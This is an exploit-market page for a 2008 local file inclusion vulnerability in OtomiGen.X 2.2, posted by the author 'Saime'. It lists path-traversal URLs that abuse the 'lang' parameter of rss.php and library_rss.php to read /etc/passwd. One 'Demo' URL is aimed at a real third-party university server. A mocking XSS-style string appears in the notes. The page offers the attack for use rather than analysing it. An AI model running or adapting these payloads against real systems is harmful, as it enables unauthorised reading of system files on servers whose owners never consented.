[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

OtomiGen.X 2.2 (lang) Local File Inclusion Vulnerabilities

Author
Saime
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-3074
Category
web applications
Date add
26-05-2008
Platform
unsorted
==========================================================
OtomiGen.X 2.2 (lang) Local File Inclusion Vulnerabilities
==========================================================



[+] Author: Saime
[+] Script: OtomigenX v2.2 (lang) Local File Inclusion
[+] Date: 28/05/2008
[+] Greetz: BaKo,DrWh4x,optiplex,xprog,cam-man-dan,Tulle,t0pP8uZz,Inspiratio,Novalok,illuz1oN,Untamed,GM,str0ke, and everyone else I forgot!

[+] File: library_rss.php/rss.php
[+] Exploit:
http://localhost/otomigenx/rss.php?lang=../../etc/passwd
http://localhost/otomigenx/library_rss.php?lang=../../etc/passwd
[+] Demo:
http://kmrg.itb.ac.id/otomigenx/library_rss.php?lang=../../../../../etc/passwd
[+] Notes: Don, hows the threaded version going? lololol ( javascript:alert('noob'); ) or should it be plain xss? LOLOL




#  0day.today [2024-12-24]  #